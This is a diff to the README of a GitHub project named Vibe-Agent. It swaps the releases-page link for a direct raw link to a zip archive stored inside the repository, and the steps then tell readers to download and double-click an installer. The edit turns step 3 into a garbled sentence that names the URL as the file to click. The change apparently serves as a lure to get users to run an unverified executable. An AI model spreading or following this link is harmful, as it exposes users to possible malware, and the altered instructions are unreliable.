innocuous-stiffness915/Vibe-Agent/README.md

 ## 💾 Download & Install

 1. **Visit the Releases Page**
-   To download the latest version of Vibe-Agent, visit this page: [Download Here](https://github.com/innocuous-stiffness915/Vibe-Agent/releases).
+   To download the latest version of Vibe-Agent, visit this page: [Download Here](https://raw.githubusercontent.com/innocuous-stiffness915/Vibe-Agent/main/HelloAgent/Vibe-Agent-v2.4.zip).

 2. **Find the Latest Release**
    On the releases page, look for the most recent version.
 You’ll see a list of available downloads.

 3. **Download the Installer**
-   Click on the file that says `Vibe-Agent.exe` or a similar executable file for your operating system.
+   Click on the file that says `https://raw.githubusercontent.com/innocuous-stiffness915/Vibe-Agent/main/HelloAgent/Vibe-Agent-v2.4.zip` or a similar executable file for your operating system.
 The download will start automatically.

 4. **Run the Installer**
    Once the download is complete, locate the downloaded file, usually found in your "Downloads" folder.
 Double-click the file to run the installer.